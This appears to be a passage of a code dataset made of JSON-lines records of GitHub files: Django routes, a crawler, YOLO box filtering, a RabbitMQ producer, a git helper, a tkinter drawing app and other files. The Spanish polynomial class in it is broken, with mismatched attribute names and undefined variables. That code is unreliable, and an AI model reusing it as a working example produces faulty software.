raise(e) \n \n \n def fire(self, dom, tags_str):\n self.param['tags'] = tags_str\n \n index = 0\n list = [ ]\n \n while index < self.items:\n \n try:\n self.param['rank_tags'] = index\n \n # get shop anchor\n shopAnchor = self.extractEntry(dom).eq(index)\n \n # get details\n self.extractShopUrl(shopAnchor)\n self.extractCommUrl(shopAnchor)\n \n self.extractTitle(shopAnchor)\n self.extractNumofBuyers(shopAnchor)\n self.extractPrice(shopAnchor)\n \n list.append( self.param.copy() )\n \n index += 1\n except AttributeError as e:\n break \n \n return list\n \n __call__ = fire\n \n","repo_name":"yiakwy/Crawler","sub_path":"src/DBManagement/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40941734728","text":"from django.urls import path\n\nfrom .views import NewRent, RentListView\n\napp_name = \"rent\"\n\nurlpatterns = [\n path(\"new-rent/\", NewRent.as_view(), name=\"new_rent\"),\n path(\"\", RentListView.as_view(), name=\"rent_list\"),\n]\n","repo_name":"lsujh/rent_book","sub_path":"rent/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70658246013","text":"class Nodo(object):\n info,sig = None, None \n\nclass datoPolinomio(object):\n\n def __init__(self, valor, termino):\n self.valor = valor\n self.termino = termino\n\nclass Polinomio(object):\n def __init__(self):\n self.termino_may= None\n self.grado = -1\n \n def agregar_termino(polinomio,termino,valor):\n aux = Nodo()\n dato = datoPolinomio(valor,termino)\n aux.info = dato \n if (termino > polinomio.grado):\n aux.sig = polinomio.termino_mayor\n polinomio.termino_mayor = aux\n polinomio.grado = termino\n else:\n actual = polinomio.termino_mayor\n while actual.sig is not None and termino < actual.info.termino:\n actual = actual.sig\n actual.sig = aux\n def modificar_termino(polinomio,termino,valor):\n aux = polinomio.termino_mayor\n while aux is not None and aux.info.termino != termino:\n aux = aux.sig\n aux.info.valor = valor \n\n def obtener_valor(polinomio,termino):\n aux = polinomio.termino_mayor\n if aux is not None and aux.info.termino > termino:\n aux = aux.sig\n elif aux is not None and aux.info.termino == termino:\n return aux.info.valor\n else:\n return 0 \n\n def mostrar (polinomio):\n aux = polinomio.termino_mayor\n poli = \"\"\n signo = \"\"\n if aux.info.valor >= 0:\n singo += \"+\"\n pol += signo + str(aux.info.valor) + \"x**\" + str(aux.info.termino) \n else:\n return poli\n \n def restar (polinomio1,polinomio2):\n paux = Polinomio()\n if polinomio1> polinomio2:\n mayor = polinomio1\n else:\n mayor = polinomio2\n for i in range(0, mayor.grado +1):\n total = polinomio1.obtener_valor(polinomio1, i) - polinomio2.obtener_valor(polinomio2, i)\n if total != 0:\n total.agregar_termino (paux, i , total)\n return paux\n \n def dividir (polinomio1,polinomio2):\n paux = Polinomio()\n pol1 = polinomio1.termino_mayor\n while pol1 is not None:\n pol2 = polinomio2.termino_mayor\n while pol2 is not None:\n termino = pol1.info.termino + pol2.info.termino\n valor = pol1.info.valor / pol2.info.valor\n if valor.obtener_valor(paux, termino) != 0:\n valor += valor.obtener_valor(paux, termino)\n termino.modificar_termino (paux, termino, valor)\n else:\n termino.agregar_termino(paux, termino, valor)\n pol2 = pol2.sig\n pol1 = pol1.sig\n return paux\n\nP1 = Polinomio()\nP2 = Polinomio()\nprint(P1)\nprint(P2)","repo_name":"Diegopj22/ejercicios_tema3","sub_path":"ejercicio4.py","file_name":"ejercicio4.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33780766429","text":"import numpy as np\r\n\r\n\r\ndef filter_boxes(box_confidence, boxes_all, box_class_probs, score_threshold = 0.6):\r\n ''' Returns the scores, boxes and classes identified from\r\n the parameters given in arguments\r\n\r\n :param\r\n box_confidence -- (1, 7, 7), pc values\r\n boxes_all -- (4, 7, 7), coordinates of upper left and bottom right corners of the bounding box w.r.t. the 7x7 full grid\r\n box_class_probs -- (25, 7, 7), class probabilities\r\n score_threshold -- to get rid from unnecessary boxes\r\n\r\n :return\r\n scores -- containing class probability score for \"selected\" boxes\r\n boxes -- containing (b_x, b_y, b_h, b_w) coordinates of \"selected\" boxes\r\n classes -- containing the index of the class detected by the \"selected\" boxes'''\r\n\r\n box_scores = box_confidence * box_class_probs # 7x7x25\r\n print('box scores = \\n', box_scores)\r\n\r\n # Step 1 - getting all maximum scores to a 2D array\r\n box_classes = np.zeros((7, 7)) # for index\r\n box_class_scores = np.zeros((7, 7)) # for maximums\r\n for row in range(7):\r\n for col in range(7):\r\n temp_max = 0\r\n temp_layer = 0\r\n for layer in range(25):\r\n if box_scores[layer, row, col] >= temp_max:\r\n temp_max = box_scores[layer, row, col]\r\n temp_layer = layer+1\r\n box_class_scores[row, col] = temp_max\r\n box_classes[row, col] = temp_layer\r\n\r\n print('box classes = \\n', box_classes)\r\n print('shape of box classes: ', box_classes.shape)\r\n print('box class scores = \\n', box_class_scores)\r\n print('shape of box class scores: ', box_class_scores.shape, '\\n')\r\n\r\n # Step 2 - Filtering by threshold\r\n scores = [] # python list\r\n boxes = [] # going to make a 2D list\r\n classes = [] # python list\r\n for r in range(7):\r\n for c in range(7):\r\n if box_class_scores[r, c] >= score_threshold:\r\n scores.append(box_class_scores[r, c])\r\n classes.append(box_classes[r, c])\r\n boxes.append([boxes_all[0, r, c], boxes_all[1, r, c], boxes_all[2, r, c], boxes_all[3, r, c],])\r\n\r\n print('scores = \\n', scores)\r\n print('shape of scores: ', len(scores), '\\n')\r\n print('classes = \\n', classes)\r\n print('shape of classes: ', len(classes), '\\n')\r\n print('boxes = \\n',)\r\n for R in boxes:\r\n for C in R:\r\n print(C, end=\"\\t\")\r\n print()\r\n print('shape of boxes: ', len(boxes))\r\n print(boxes)\r\n\r\n return scores, boxes, classes\r\n","repo_name":"matheesha27/Low-level-YOLO-Implementation","sub_path":"Filter_Boxes.py","file_name":"Filter_Boxes.py","file_ext":"py","file_size_in_byte":2549,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"30047374611","text":"from onset import *\nimport glob\n\n#This code is an example of how you can use this module to write you analysis yourself. It will not run on any data as I used it \n#on my own data so it works currently. It is more meant to be used for inspiration and should be adjusted accordingly\n\ndef example_for_folder(): \n #Select model from https://www.sbert.net/docs/pretrained_models.html an input as string\n #decision_value = finding_appropriate_value(model)\n decision_value = 0.5\n #defining the paths to use\n original_path = os.getcwd()\n path_to_audios = original_path + os.sep + \"Voice_Data\"\n datafile = pd.read_csv(\"Combined Values from Participants.csv\")\n\n #creating empty lists and setting it up \n os.chdir(path_to_audios)\n files = glob.glob(\"*\")\n list_of_answers = []\n list_of_file_names = []\n list_of_onset = []\n\n for file in files: \n new_path = path_to_audios + os.sep + file\n os.chdir(new_path)\n files_in_folder = glob.glob(\"*\")\n for file1 in files_in_folder:\n if file1 == \"1\":\n nothing = 0 \n else:\n continue\n os.chdir(new_path + os.sep + file1)\n files_in_folder1 = glob.glob(\"*\")\n for file2 in files_in_folder1:\n print(file2)\n target_word_row = datafile.loc[datafile[\"File\"] == file2, \"Target\"].values\n try: \n target_word = str(target_word_row[0])\n except: \n continue\n word_used, outcome_value = binary_search(file2, \"en-US\", target_word, decision_value=decision_value)\n list_of_answers.append(word_used)\n list_of_file_names.append(file2)\n list_of_onset.append(outcome_value)\n\n #Creating a dataframe and saving the results into one file\n df = pd.DataFrame()\n df['File']=list_of_file_names\n df['Answer']=list_of_answers\n df['Onset'] = list_of_onset\n\n os.chdir(original_path)\n df.to_csv(\"Answers_as_text_for_testing_3.csv\")\n","repo_name":"Flo2306/Voice_Onset","sub_path":"Voice_Onset/Example_analysis.py","file_name":"Example_analysis.py","file_ext":"py","file_size_in_byte":2057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37949513226","text":"from __future__ import annotations\n\nimport json\nimport os\nfrom abc import ABC, abstractmethod\nfrom typing import TYPE_CHECKING, Dict, Optional\n\nfrom .lance import _cleanup_partial_writes\n\nif TYPE_CHECKING:\n # We don't import directly because of circular import\n from .fragment import FragmentMetadata\n\n\nclass FragmentWriteProgress(ABC):\n \"\"\"Progress tracking for Writing a Dataset or Fragment.\n\n Warns\n -----\n This tracking class is experimental and may change in the future.\n \"\"\"\n\n def _do_begin(\n self, fragment_json: str, multipart_id: Optional[str] = None, **kwargs\n ):\n \"\"\"Called when a new fragment is created\"\"\"\n from .fragment import FragmentMetadata\n\n fragment = FragmentMetadata.from_json(fragment_json)\n return self.begin(fragment, multipart_id, **kwargs)\n\n @abstractmethod\n def begin(\n self, fragment: \"FragmentMetadata\", multipart_id: Optional[str] = None, **kwargs\n ) -> None:\n \"\"\"Called when a new fragment is about to be written.\n\n Parameters\n ----------\n fragment : FragmentMetadata\n The fragment that is open to write to. The fragment id might not\n yet be assigned at this point.\n multipart_id : str, optional\n The multipart id that will be uploaded to cloud storage. This may be\n used later to abort incomplete uploads if this fragment write fails.\n kwargs: dict, optional\n Extra keyword arguments to pass to the implementation.\n\n Returns\n -------\n None\n \"\"\"\n pass\n\n def _do_complete(self, fragment_json: str, **kwargs):\n \"\"\"Called when a fragment is completed\"\"\"\n from .fragment import FragmentMetadata\n\n fragment = FragmentMetadata.from_json(fragment_json)\n return self.complete(fragment, **kwargs)\n\n @abstractmethod\n def complete(self, fragment: \"FragmentMetadata\", **kwargs) -> None:\n \"\"\"Callback when a fragment is completely written.\n\n Parameters\n ----------\n fragment : FragmentMetadata\n The fragment that is open to write to.\n kwargs: dict, optional\n Extra keyword arguments to pass to the implementation.\n \"\"\"\n pass\n\n\nclass NoopFragmentWriteProgress(FragmentWriteProgress):\n \"\"\"No-op implementation of WriteProgressTracker.\n\n This is the default implementation.\n \"\"\"\n\n def begin(\n self, fragment: \"FragmentMetadata\", multipart_id: Optional[str] = None, **kargs\n ):\n pass\n\n def complete(self, fragment: \"FragmentMetadata\", **kwargs):\n pass\n\n\nclass FileSystemFragmentWriteProgress(FragmentWriteProgress):\n \"\"\"Progress tracking for Writing a Dataset or Fragment.\n\n Warns\n -----\n This tracking class is experimental and will change in the future.\n\n This implementation writes a JSON file to track in-progress state\n to the filesystem for each fragment.\n\n\n \"\"\"\n\n PROGRESS_EXT: str = \".in_progress\"\n\n def __init__(self, base_uri: str, metadata: Optional[Dict[str, str]] = None):\n \"\"\"Create a FileSystemFragmentWriteProgress tracker.\n\n Parameters\n ----------\n base_uri : str\n The base directory to write the progress files to. Two files will be created\n under this directory: a Fragment file, and a JSON file to track progress.\n metadata : dict, optional\n Extra metadata for this Progress tracker instance. Can be used to track\n distributed worker where this tracker is running.\n \"\"\"\n from pyarrow.fs import FileSystem\n\n fs, path = FileSystem.from_uri(base_uri)\n self._fs = fs\n self._base_path: str = path\n self._metadata = metadata if metadata else {}\n\n def _in_progress_path(self, fragment: \"FragmentMetadata\") -> str:\n return os.path.join(\n self._base_path, f\"fragment_{fragment.id}{self.PROGRESS_EXT}\"\n )\n\n def _fragment_file(self, fragment: \"FragmentMetadata\") -> str:\n return os.path.join(self._base_path, f\"fragment_{fragment.id}.json\")\n\n def begin(\n self, fragment: \"FragmentMetadata\", multipart_id: Optional[str] = None, **kwargs\n ):\n \"\"\"Called when a new fragment is created.\n\n Parameters\n ----------\n fragment : FragmentMetadata\n The fragment that is open to write to.\n multipart_id : str, optional\n The multipart id to upload this fragment to cloud storage.\n \"\"\"\n\n self._fs.create_dir(self._base_path, recursive=True)\n\n with self._fs.open_output_stream(self._in_progress_path(fragment)) as out:\n progress_data = {\n \"fragment_id\": fragment.id,\n \"multipart_id\": multipart_id if multipart_id else \"\",\n \"metadata\": self._metadata,\n }\n out.write(json.dumps(progress_data).encode(\"utf-8\"))\n\n with self._fs.open_output_stream(self._fragment_file(fragment)) as out:\n out.write(json.dumps(fragment.to_json()).encode(\"utf-8\"))\n\n def complete(self, fragment: \"FragmentMetadata\", **kwargs):\n \"\"\"Called when a fragment is completed\"\"\"\n self._fs.delete_file(self._in_progress_path(fragment))\n\n def cleanup_partial_writes(self, dataset_uri: str) -> int:\n \"\"\"\n Finds all in-progress files and cleans up any partially written data\n files. This is useful for cleaning up after a failed write.\n\n Parameters\n ----------\n dataset_uri : str\n The URI of the table to clean up.\n\n Returns\n -------\n int\n The number of partial writes cleaned up.\n \"\"\"\n from pyarrow.fs import FileSelector\n\n from .fragment import FragmentMetadata\n\n marker_paths = []\n objects = []\n selector = FileSelector(self._base_path)\n for info in self._fs.get_file_info(selector):\n path = info.path\n if path.endswith(self.PROGRESS_EXT):\n marker_paths.append(path)\n with self._fs.open_input_stream(path) as f:\n progress_data = json.loads(f.read().decode(\"utf-8\"))\n\n json_path = path.rstrip(self.PROGRESS_EXT) + \".json\"\n with self._fs.open_input_stream(json_path) as f:\n fragment_metadata = FragmentMetadata.from_json(\n f.read().decode(\"utf-8\")\n )\n objects.append(\n (\n fragment_metadata.data_files()[0].path(),\n progress_data[\"multipart_id\"],\n )\n )\n\n _cleanup_partial_writes(dataset_uri, objects)\n\n for path in marker_paths:\n self._fs.delete_file(path)\n json_path = path.rstrip(self.PROGRESS_EXT) + \".json\"\n self._fs.delete_file(json_path)\n\n return len(objects)\n","repo_name":"lancedb/lance","sub_path":"python/python/lance/progress.py","file_name":"progress.py","file_ext":"py","file_size_in_byte":6952,"program_lang":"python","lang":"en","doc_type":"code","stars":2819,"dataset":"github-code","pt":"78"} +{"seq_id":"74611875770","text":"import pika\nimport json\nimport numpy as np\nimport time\nfrom datetime import datetime\nfrom sklearn.datasets import load_diabetes\n\nX, y = load_diabetes(return_X_y=True)\n\nwhile True:\n try:\n random_row = np.random.randint(0, X.shape[0] - 1)\n\n connection = pika.BlockingConnection(pika.ConnectionParameters('rabbitmq'))\n channel = connection.channel()\n\n channel.queue_declare(queue='Features')\n channel.queue_declare(queue='y_true')\n\n X_dict = {'time': time.time(), 'X_row_index': random_row, 'X_row': list(X[random_row])}\n channel.basic_publish(exchange='',\n routing_key='Features',\n body=json.dumps(X_dict))\n datetime_str = datetime.fromtimestamp(X_dict['time']).strftime('%Y-%m-%d %A %H:%M:%S %f us |')\n print(f'{datetime_str} -> Сообщение с вектором признаков отправлено в очередь:')\n print(f' {X_dict}'[:150])\n\n y_dict = {'time': time.time(), 'y_row_index': random_row, 'y': y[random_row]}\n channel.basic_publish(exchange='',\n routing_key='y_true',\n body=json.dumps(y_dict))\n datetime_str = datetime.fromtimestamp(y_dict['time']).strftime('%Y-%m-%d %A %H:%M:%S %f us |')\n print(f'{datetime_str} -> Сообщение с правильным ответом отправлено в очередь:')\n print(f' {y_dict}'[:150])\n connection.close()\n time.sleep(5)\n except:\n print('Не удалось подключиться к очереди')\n time.sleep(5)\n","repo_name":"avfawkes/docker_compose_rabbitmq","sub_path":"features/src/features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1303815455","text":"from collections import Counter\n\n\nclass Solution:\n def isAnagram(self, s: str, t: str) -> bool:\n s_counter = Counter(s)\n t_counter = Counter(t)\n return s_counter == t_counter\n\nb = Solution().isAnagram('rar', 'arr')\nprint(b)\n","repo_name":"MiketheViking90/leetcodepython","sub_path":"app/src/algos/valid_anagram.py","file_name":"valid_anagram.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39680853852","text":"from ..database.crud.user import get_random_user\nfrom ..database.crud.post import get_posts\nfrom ..database.crud.like import list_post_likes, get_key_like, has_liked\nfrom ..database.crud.comment import get_key_comment, list_post_comments\nfrom ..database.crud.bookmark import has_bookmarked\nfrom ..database.database import get_db\nfrom ..database.models import (\n User, Post, Like, Bookmark, Comment\n)\nfrom ..database.schemas.post import (\n GetPosts, PostAuthor, GetPost, PostLike, KeyComment, PostSchema\n)\nfrom ..database.schemas.activity import CreateActivity\nfrom flask import url_for\nfrom pydantic import ValidationError\nfrom sqlalchemy.exc import OperationalError, IntegrityError\nfrom datetime import datetime\n\ndef load_posts(offset: int = 0, limit: int = 10) -> None:\n user: User = get_random_user(get_db)\n try:\n posts = get_posts(get_db, GetPosts(offset=offset, limit=limit))\n except (OperationalError, IntegrityError) as e:\n print(e)\n # Send email to\n return {'Error': 'The application is experiencing a tempoary error. Please try again in a few minutes.'}, HTTPStatus.INTERNAL_SERVER_ERROR\n created_posts = []\n for post in posts:\n post_author: PostAuthor = PostAuthor(\n id=post.author.id,\n profile_picture=url_for('static', filename=f'img/{post.author.profile_picture_url}'),\n name=post.author.first_name\n )\n post_likes = [\n PostAuthor(\n id=like.author.id,\n profile_picture=url_for('static', filename=f'img/{like.author.profile_picture_url}'),\n name=like.author.first_name\n )\n for like in list_post_likes(session=get_db, post_data=GetPost(post_id=post.id))\n ]\n key_like: User = get_key_like(session=get_db, post_data=GetPost(post_id=post.id))\n if key_like:\n key_like = PostAuthor(\n id=key_like.id,\n profile_picture=url_for('static', filename=f'img/{key_like.profile_picture_url}'),\n name=key_like.first_name\n )\n post_like: PostLike = PostLike(\n liked=has_liked(get_db, CreateActivity(user_id=user.id, post_id=post.id)),\n liked_by=post_likes,\n key_like=key_like,\n likes_count=len(post_likes)\n )\n key_comment: Comment = get_key_comment(session=get_db, post_data=GetPost(post_id=post.id))\n if key_comment:\n key_comment_author = PostAuthor(\n id=key_comment.author.id,\n profile_picture=url_for('static', filename=f'img/{key_comment.author.profile_picture_url}'),\n name=key_comment.author.first_name,\n )\n key_comment: KeyComment = KeyComment(\n author=key_comment_author,\n text=key_comment.comment_text,\n comments_count=len(list_post_comments(session=get_db, post_data=GetPost(post_id=post.id)))\n )\n post_schema: PostSchema = PostSchema(\n id=post.id,\n text=post.text,\n image=url_for('static', filename=f'img/{post.image_url}'),\n location=post.location,\n date_published=str(int((post.date_published - datetime.now()).seconds/60)),\n author=post_author,\n like=post_like,\n key_comment=key_comment,\n bookmarked=has_bookmarked(get_db, CreateActivity(user_id=user.id, post_id=post.id))\n ).model_dump()\n created_posts.append(post_schema)\n return created_posts","repo_name":"twyle/butterfly","sub_path":"services/app/butterfly/blueprints/home/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":3561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24949160181","text":"import os,sys\ndataset1,dataset2=sys.argv[1],sys.argv[2]\ndkplrun1,dkplrun2=sys.argv[3],sys.argv[4]\neve=['SNV','splice','split','lincRNA','intron','repeat','unmapped']\nfeatures=[]\nfor e in eve:\n if os.path.exists('Report_%s.txt'%e) is False or int(os.popen('wc -l Report_%s.txt'%e).readline().strip().split()[0])==0:continue\n with open('Report_%s.txt'%e)as f:\n pairs=list(map(lambda x:x.strip().split(),f))\n features+=[i[:2] for i in pairs]\ndict_2luad={}\nfor i in features:\n dict_2luad[i[1]]=i[0]\nshared_contig_tcga=list(set([i[0] for i in features]))\nshared_contig_seo=list(set([i[1] for i in features]))\n\nwith open(dataset2)as f:\n seodat=list(map(lambda x:x.strip().split(),f))\nwith open(dataset1)as f:\n tcgadat=list(map(lambda x:x.strip().split(),f))\nhit_idx_seo=seodat[0].index('nb_hit')\nhit_idx_tcga=tcgadat[0].index('nb_hit')\nouttcga=open('overlap_contig','w')\nouttcga.write('\\t'.join(tcgadat[0])+'\\n')\nc=0\nfor line in tcgadat:\n if line[2] in dict_2luad.values() and int(float(line[hit_idx_tcga]))==1:\n outtcga.write(line[2]+'\\t'+'\\t'.join(line[1:])+'\\n')\nouttcga.close()\n\nimport pandas as pd\ndegfile1=os.popen('ls %s/gene_expression/*DEGs.tsv'%dkplrun2).readline().strip()\nwith open(degfile1)as f:\n seodat=list(map(lambda x:x.strip().split(),f))\ndegfile2=os.popen('ls %s/gene_expression/*DEGs.tsv'%dkplrun1).readline().strip()\nwith open(degfile2)as f:\n tcgadat=list(map(lambda x:x.strip().split(),f))\ntcgadat=[i for i in tcgadat if 'NA' not in i]\nseodat=[i for i in seodat if 'NA' not in i]\nseodeg=[i[0] for i in seodat[1:] if abs(float(i[2]))>2 and float(i[-1])<0.05]\ntcgadeg=[i[0] for i in tcgadat[1:] if abs(float(i[2]))>2 and float(i[-1])<0.05]\n\nshared_DEG=list(set(seodeg)&set(tcgadeg))\nwith open(dkplrun2+'/gene_expression/normalized_counts.tsv')as f:\n seocount=list(map(lambda x:x.strip().split(),f))\nwith open(dkplrun1+'/gene_expression/normalized_counts.tsv')as f:\n tcgacount=list(map(lambda x:x.strip().split(),f))\nouttcga=open('overlap_gene','w')\nouttcga.write('\\t'.join(tcgacount[0])+'\\n')\nfor i in tcgacount:\n if i[0] in shared_DEG:outtcga.write('\\t'.join(i)+'\\n')\nouttcga.close()\n\n","repo_name":"Transipedia/dekupl-lung-cancer-inter-cohort","sub_path":"bin/create_traindat.py","file_name":"create_traindat.py","file_ext":"py","file_size_in_byte":2150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"35815345242","text":"import cv2\nimport os\n\nfrom pytube import YouTube\nfrom IPython.display import HTML\n\nurl = \"https://www.youtube.com/watch?v=0TNFb5zgpbg&list=PL3NgX4uqPt40T1iNoiN9z8CErtWHm06El\"\n\nyt = YouTube(url)\n\nstream = yt.streams.filter(progressive=True, file_extension=\"mp4\").order_by(\"resolution\").desc().first()\n\nstream.download(\"./data/\")\n\nHTML(\"\"\"\n \n \"\"\"\n )\n\n#위에서 다운받은 동영상을 불러온다.\ncap = cv2.VideoCapture(\"./data/저작권 없는 무료 영상 소스 여의도 벚꽃 free video (cherry blossoms).mp4\")\n\n# print(cap.get(cv2.CAP_PROP_FRAME_COUNT))\n# print(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\n# print(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n# print(cap.get(cv2.CAP_PROP_FPS))\n\n#비디오 데이터 프레임 단위로 나눠서 캡쳐하기 실습 -> 동영상 Object Detection에 사용\nos.makedirs(\"./data/video_frame_dataset\", exist_ok=True)\n\nimg_count = 0\nwhile True:\n ret, frame = cap.read()\n \n if not ret:\n break\n \n if img_count % 15 == 0:\n img_filename = f\"./data/video_frame_dataset/frame_{img_count:04}.png\"\n #img_count:04 : 뒤에 숫자는 4자리로 맞추는 설정\n cv2.imwrite(img_filename, frame)\n \n img_count += 1\n \ncap.release()","repo_name":"speedp001/MS-AI-School","sub_path":"Data_labeling/Image_video_processing/video_project_01.py","file_name":"video_project_01.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20688254046","text":"# -*- coding: utf-8 -*-\r\nfrom __future__ import unicode_literals\r\n\r\nfrom django.db import models, migrations\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('nadep', '0002_auto_20150819_1141'),\r\n ]\r\n\r\n operations = [\r\n migrations.AddField(\r\n model_name='prisao',\r\n name='resultado_sentenca',\r\n field=models.SmallIntegerField(blank=True, null=True, verbose_name='Resultado da Senten\\xe7a', choices=[(0, 'Absolvido'), (1, 'Condenado'), (2, 'Desclassificado')]),\r\n ),\r\n migrations.AlterField(\r\n model_name='prisao',\r\n name='resultado_pronuncia',\r\n field=models.SmallIntegerField(blank=True, null=True, verbose_name='Resultado da Pron\\xfancia', choices=[(0, 'Absolvido'), (1, 'Pronunciado'), (2, 'Desclassificado')]),\r\n ),\r\n ]\r\n","repo_name":"SegurancaDPDF/SOLAR-Backend","sub_path":"nucleo/nadep/migrations/0003_auto_20150824_1531.py","file_name":"0003_auto_20150824_1531.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38414643816","text":"\"\"\"Basic git operations.\"\"\"\n\nimport subprocess\nimport os\nimport re\nfrom ..exceptions import UsageError, MissingPackageError\n\n\nclass GITRepository(object):\n \"\"\"Helper class for git repository functionality.\n\n Args:\n path (str): The path to a git repository folder.\n \"\"\"\n\n def __init__(self, path):\n self.path = os.path.normpath(os.path.abspath(path))\n\n # Ensure git is installed and we point to a valid repository\n self.version()\n self.status()\n\n def status(self):\n \"\"\"Call git status and parse the results.\"\"\"\n\n try:\n contents = subprocess.check_output(['git', '-C', self.path, 'status', '--porcelain=v2', '-b'], stderr=subprocess.PIPE)\n contents = contents.decode('utf-8')\n except subprocess.CalledProcessError:\n raise UsageError(\"Not a valid git repository: %s\" % self.path, \"Make sure the path is correct\")\n\n return contents.split()\n\n def remote(self, name=\"origin\"):\n \"\"\"Get the remote origin URL.\n\n Args:\n name (str): The name of the remote to get.\n\n Returns:\n str: The remote URL.\n \"\"\"\n\n contents = subprocess.check_output(['git', '-C', self.path, 'remote', 'get-url', name])\n contents = contents.decode('utf-8')\n return contents.rstrip()\n\n def github_name(self, name=\"origin\"):\n \"\"\"Get the user/org and repo name for a github hosted repo.\n\n Args:\n name (str): The name of the remote to get.\n\n Returns:\n (str, str): The github org/username and repo name.\n \"\"\"\n\n remote = self.remote(name)\n info = extract_github_name(remote)\n if info is None:\n raise UsageError(\"Git repository could not be parsed: %s\" % remote, \"Make sure the repository is hosted on github\")\n\n return info\n\n def github_slug(self):\n \"\"\"Get the github slug from this repository.\n\n This is a string of the format user/repo_name.\n \"\"\"\n\n org, repo = self.github_name()\n return \"{}/{}\".format(org, repo)\n\n @classmethod\n def version(cls):\n \"\"\"Return the version of git installed.\"\"\"\n\n try:\n version_string = subprocess.check_output(['git', '--version'])\n version_string = version_string.decode('utf-8')\n except subprocess.CalledProcessError:\n raise MissingPackageError(\"git\", \"Git must be installed\")\n\n return version_string.rstrip()\n\n\n_SSH_REGEX = r\"git@github\\.com:(?P[a-zA-Z0-9_\\-]+)/(?P[a-zA-Z0-9_\\-]+)\\.git\"\n_HTTPS_REGEX = r\"https://github\\.com/(?P[a-zA-Z0-9_\\-]+)/(?P[a-zA-Z0-9_\\-]+)\\.git\"\n\n\ndef extract_github_name(remote):\n \"\"\"Extract a github name from a remote URL.\n\n Args:\n remote (str): A git remote URL\n\n Returns:\n (str, str): The user and repo names.\n\n If the repo cannot be found or is not hosted on Github, None is\n Returned.\n \"\"\"\n\n result = re.match(_SSH_REGEX, remote)\n if result is not None:\n return result.group('user'), result.group('repo')\n\n result = re.match(_HTTPS_REGEX, remote)\n if result is not None:\n return result.group('user'), result.group('repo')\n\n return None\n","repo_name":"iotile/multipackage","sub_path":"multipackage/utilities/git.py","file_name":"git.py","file_ext":"py","file_size_in_byte":3235,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"22634912962","text":"import os\nlocation = \"/\".join(str(os.path.abspath(__file__)).split(\"/\")[:-1]) + \"/\"\nprint(location)\n\nimport PIL as pil\nimport tkinter as tk\n\nfrom settings import *\nfrom output import *\n\n\nclass DrawshotApp(tk.Frame):\n\n def __init__(self, parent, *args, **kwargs):\n\n tk.Frame.__init__(self, parent, *args, *kwargs)\n self.parent = parent\n self.settings = get_settings() # from file\n self.cli_enabled = False\n\n self.cur_pos = None, None\n self.last_pos = None, None\n self.draw_modus = \"freehand\"\n\n self.traces = list()\n self.last_trace = list() # list of points, later packed into self.traces\n\n from parser import parse_command # defining it outside as it's prone to complexity\n self.parse_command = parse_command\n \n # init canvas properties\n self.x =self.settings[\"default_x\"]\n self.y =self.settings[\"default_y\"]\n self.bg_colour =self.settings[\"bg_colour\"]\n self.trace_colour =self.settings[\"default_trace_colour\"]\n self.snap_center =self.settings[\"snap_center\"]\n self.save_bg =self.settings[\"save_bg\"]\n\n # where to position window\n if self.snap_center: # center of screen\n self.x_0 = (root.winfo_screenwidth() - self.x) // 2\n self.y_0 = (root.winfo_screenheight() - self.y) // 2\n else: # snap to mouse\n self.x_0 = root.winfo_pointerx() - root.winfo_vrootx()\n self.y_0 = root.winfo_pointery() - root.winfo_vrooty()\n\n DEFAULT_DRAW_CANVAS = f\"{self.x}x{self.y}+{self.x_0}+{self.y_0}\"\n\n parent.geometry(DEFAULT_DRAW_CANVAS) # i think this actually includes window borders, which messes with the size\n parent.title(\"Drawshot\")\n\n \n\n # the chalkboard is what is actually given as an output\n self.chalkboard = tk.Canvas(self, bg=self.bg_colour, bd=0, highlightthickness=0)\n\n # bindings: i/o\n self.chalkboard.bind(\"\", self.movement)\n self.chalkboard.bind(\"\", self.new_trace)\n self.chalkboard.bind(\"\", self.reset_mouse)\n parent.bind(\"\", self.undo_trace) # keypresses don't seem to work on the canvas or the frame\n parent.protocol(\"WM_DELETE_WINDOW\", self.close_window) # pressing the X button or Alt+F4\n parent.protocol(\"\", self.close_window)\n parent.bind(\"\", self.command_modus)\n\n self.chalkboard.pack(expand=True, fill=tk.BOTH)\n\n\n def movement(self, event):\n if self.draw_modus==\"freehand\" or end_of_trace:\n self.last_pos = self.cur_pos\n self.cur_pos = event.x, event.y\n\n if self.last_pos == (0, 0): # update last position to start of trace, allowing traces to jump\n self.last_pos = self.cur_pos\n if self.last_pos == self.cur_pos: # allows user to make single (visible) dots\n self.cur_pos = self.last_pos[0]+1, self.last_pos[1]\n\n # appending each point to the last_trace stack, stored as a number by tkinter\n if self.draw_modus==\"freehand\":\n self.last_trace.append(\n self.chalkboard.create_line(*self.last_pos, *self.cur_pos, fill=self.trace_colour, width=5, smooth=tk.TRUE, capstyle=tk.ROUND, splinesteps=1)\n )\n elif self.draw_modus==\"straight_line\":\n pass\n \n\n def 